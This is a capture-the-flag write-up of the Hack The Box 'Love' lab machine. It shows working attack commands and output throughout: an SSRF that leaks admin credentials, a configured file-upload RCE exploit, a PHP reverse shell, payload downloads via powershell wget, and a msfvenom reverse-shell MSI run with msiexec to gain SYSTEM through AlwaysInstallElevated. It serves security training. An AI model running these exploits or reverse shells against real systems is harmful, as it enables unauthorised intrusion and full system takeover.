HTB - Love
The given box Love is a Windows machine with an IP address of 10.10.10.239
- Hack The Box - Love
Recon
Adding IP to /etc/hosts
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat /etc/hosts | grep love
10.10.10.239 love.htb
Nmap Scan Result
On performing a nmap scan on the target, we can see there are 6 standard ports open
1. http - 80
2. msrpc - 135
3. netbios-ssn - 139
4. https/ssl - 443
5. smb - 445
6. mariaDB - 3306
And some service running on port 5000
And also it discovered that the machine is running Windows 7 OS
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A love.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 12:17 IST
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| SIPOptions:
|_ Host '10.10.14.8' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=9/15%Time=61419732%P=x86_64-pc-linux-gnu%r(SI
SF:POptions,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/15%OT=80%CT=1%CU=30811%PV=Y%DS=2%DC=T%G=Y%TM=6141975
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)
Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 27m50s, deviation: 0s, median: 27m50s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-15T07:16:29
|_ start_date: N/A
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 267.10 ms 10.10.14.1
2 267.36 ms love.htb (10.10.10.239)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.89 seconds
After enumerating we can see that it displays some subdomain information in the scan result
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/
It has SSL Cert for staging.love.htb, lets add this to /etc/hosts so that we can access this webapp
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat /etc/hosts | grep love
10.10.10.239 love.htb staging.love.htb
Enumeration
Enumerating SMB with smbmap
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.239 -u moni
[!] Authentication error on 10.10.10.239
Can’t enumerate SMB shares with guest/fake creds, because it is using proper authentication
Enumerating SMB with smbclient
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbclient -N -L //10.10.10.239
session setup failed: NT_STATUS_ACCESS_DENIED
No luck in SMB enumeration
Enumerating MariaDB
MariaDB is almost same as MySQL which uses same commands and configurations
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ mysql -h 10.10.10.239
ERROR 1130 (HY000): Host '10.10.14.8' is not allowed to connect to this MariaDB server
Could not connect to MariaDB server
Directory bruteforcing using gobuster
We do not have adequate information about our webapp, so we need to find more paths/directories to understand the functionality of the webapp
Directory bruteforcing is a way to find more hidden details about a webapp
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ gobuster dir -u love.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://love.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/15 12:24:20 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 330] [--> http://love.htb/images/]
/Images (Status: 301) [Size: 330] [--> http://love.htb/Images/]
/admin (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/plugins (Status: 301) [Size: 331] [--> http://love.htb/plugins/]
/includes (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/examples (Status: 503) [Size: 398]
/dist (Status: 301) [Size: 328] [--> http://love.htb/dist/]
/licenses (Status: 403) [Size: 417]
/IMAGES (Status: 301) [Size: 330] [--> http://love.htb/IMAGES/]
/%20 (Status: 403) [Size: 298]
/Admin (Status: 301) [Size: 329] [--> http://love.htb/Admin/]
/*checkout* (Status: 403) [Size: 298]
/Plugins (Status: 301) [Size: 331] [--> http://love.htb/Plugins/]
/phpmyadmin (Status: 403) [Size: 298]
/webalizer (Status: 403) [Size: 298]
/*docroot* (Status: 403) [Size: 298]
/* (Status: 403) [Size: 298]
/con (Status: 403) [Size: 298]
/http%3A (Status: 403) [Size: 298]
/Includes (Status: 301) [Size: 332] [--> http://love.htb/Includes/]
/**http%3a (Status: 403) [Size: 298]
/*http%3A (Status: 403) [Size: 298]
Progress: 46492 / 220561 (21.08%)
There is an interesting directory /admin, which may lead to higher access
Enumerating web application
When we visit the webapp love.htb or its resolved IP 10.10.10.239,
we get a login form named as Voting System
Since we found a DB in port 3306, so I tried SQL injection on the login form
No luck in SQL injection
We also found that this webapp has a subdomain named staging.love.htb
Lets check that,
Seems like a file upload webapp
After browsing around, we can reach this upload page
We can enter an URL in the input field and it scans and displays output
What if we tried an SSRF?
SSRF - Server Side Request Forgery is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing
For more on SSRF
We know that there is an unknown service running on port 5000
Lets try to get that service data using SSRF by passing http://127.0.0.1:5000/ in the input field
It makes request and retrieves the the response from the server side, so that we can see the data in port 5000
We get the creds of admin user
Lets use this to login in /admin directory
After logging in /admin, we can see a Voting System Framework
Finding suitable exploits through searchsploit
After googling about Voting System, It showed it is a framework named Voting System 1.0 having lot of bugs in it
Using searchsploit to find a suitable exploit,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ searchsploit voting system
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi) | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated) | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We logged in /admin and we do have creds for admin
So lets try authenticated RCE with
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Gaining Access
Automated Exploit
Copying the exploit to working directory
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Love]
└─$ searchsploit -m php/webapps/49445.py
Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
URL: https://www.exploit-db.com/exploits/49445
Path: /usr/share/exploitdb/exploits/php/webapps/49445.py
File Type: Python script, ASCII text executable, with very long lines
Copied to: /home/aidenpearce369/HTB/Love/49445.py
Editing the configurations in the exploit code,
Before editing
# --- Edit your settings here ----
IP = "192.168.1.207" # Website's URL
USERNAME = "potter" #Auth username
PASSWORD = "password" # Auth Password
REV_IP = "192.168.1.207" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
LOGIN_URL = f"http://{IP}/votesystem/admin/login.php"
VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/votesystem/images/shell.php"
After editing
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.8" # Reverse shell IP
REV_PORT = "8989" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
After modifying this code, lets run our exploit along with netcat listener
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Love]
└─$ python3 49445.py 1 ⨯
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Love]
└─$ nc -nlvp 8989
listening on [any] 8989 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53453
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
...
C:\Users\Phoebe\Desktop>more user.txt
more user.txt
<---USER FLAG--->
C:\Users\Phoebe\Desktop>
So we are in love\phoebe privilege
Manual exploit
We can see a file upload here,
Since it is running in PHP, lets put a PHP reverse shell in the file upload
The PHP reverse shell i always use
Editing the reverse shell,
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.8'; // CHANGE THIS
$port = 5454; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'whoami';
$daemon = 0;
$debug = 0;
It is a Windows machine, so don’t use Linux commands in it
After uploading the reverse shell in image section
Check the uploaded PHP file after reloading
Note that, the image has been overriden by our PHP reverse shell
After inspecting it and opening our PHP reverse shell,
Our netcat listener will be spawned with the reverse shell
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 5454
listening on [any] 5454 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53464
love\phoebe
Privilege Escalation
We only got user level access in the machine
To get admin or NT-AUTHORITY\SYSTEM level access, we need to escalate our privilege
It takes a lot of time to enumerate the weakness for escalating privileges manually
Lets use winPEAS to enumerate all possible weakness in privilege
Clone this repo for winPEAS
┌──(aidenpearce369㉿aidenpearce369)-[~/…/winPEAS/winPEASexe/binaries/Release]
└─$ ls
winPEASany.exe
┌──(aidenpearce369㉿aidenpearce369)-[~/…/winPEAS/winPEASexe/binaries/Release]
└─$ python3 -m http.server 4545
Serving HTTP on 0.0.0.0 port 4545 (http://0.0.0.0:4545/) ...
C:\Users\Phoebe>powershell wget http://10.10.14.8:4545/winPEASany.exe -outfile privesc.exe
powershell wget http://10.10.14.8:4545/winPEASany.exe -outfile privesc.exe
C:\Users\Phoebe>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe
09/15/2021 02:00 AM <DIR> .
09/15/2021 02:00 AM <DIR> ..
04/12/2021 03:50 PM <DIR> 3D Objects
04/12/2021 03:50 PM <DIR> Contacts
04/13/2021 03:20 AM <DIR> Desktop
04/12/2021 03:50 PM <DIR> Documents
04/13/2021 09:55 AM <DIR> Downloads
04/12/2021 03:50 PM <DIR> Favorites
04/12/2021 03:50 PM <DIR> Links
04/12/2021 03:50 PM <DIR> Music
04/12/2021 03:52 PM <DIR> OneDrive
04/21/2021 07:01 AM <DIR> Pictures
09/15/2021 02:00 AM 1,924,608 privesc.exe
04/12/2021 03:50 PM <DIR> Saved Games
04/12/2021 03:51 PM <DIR> Searches
04/23/2021 03:39 AM <DIR> Videos
1 File(s) 1,924,608 bytes
15 Dir(s) 4,054,089,728 bytes free
C:\Users\Phoebe>
Lets run our winPEAS to find all possible weakness, but it displays a lot of information and it requires a proper study to understand
...
���������� Checking AlwaysInstallElevated
� https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
...
Here it shows AlwaysInstallElevated is enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If these registries are enabled with AlwaysInstallElevated, we can run and install any .msi executables as NT AUTHORITY\SYSTEM
Lets generate a malicious .msi executable through msfvenom,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=6767 -f msi -o backdoor.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: backdoor.msi
When we execute this backdoor.msi we will spawn a reverse shell with NT AUTHORITY\SYSTEM privilege
C:\Users\Phoebe>powershell wget http://10.10.14.8:4545/backdoor.msi -outfile a.msi
powershell wget http://10.10.14.8:4545/backdoor.msi -outfile a.msi
C:\Users\Phoebe>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe
09/15/2021 02:10 AM <DIR> .
09/15/2021 02:10 AM <DIR> ..
04/12/2021 03:50 PM <DIR> 3D Objects
09/15/2021 02:10 AM 159,744 a.msi
04/12/2021 03:50 PM <DIR> Contacts
04/13/2021 03:20 AM <DIR> Desktop
04/12/2021 03:50 PM <DIR> Documents
04/13/2021 09:55 AM <DIR> Downloads
04/12/2021 03:50 PM <DIR> Favorites
04/12/2021 03:50 PM <DIR> Links
04/12/2021 03:50 PM <DIR> Music
04/12/2021 03:52 PM <DIR> OneDrive
04/21/2021 07:01 AM <DIR> Pictures
09/15/2021 02:00 AM 1,924,608 privesc.exe
04/12/2021 03:50 PM <DIR> Saved Games
04/12/2021 03:51 PM <DIR> Searches
04/23/2021 03:39 AM <DIR> Videos
2 File(s) 2,084,352 bytes
15 Dir(s) 4,014,354,432 bytes free
C:\Users\Phoebe>msiexec /quiet /qn /i a.msi
msiexec /quiet /qn /i a.msi
On our netcat listener,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53474
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\Users\Phoebe\Desktop>more user.txt
more user.txt
<---USER FLAG--->
C:\Users\Administrator\Desktop>more root.txt
more root.txt
<---ROOT FLAG--->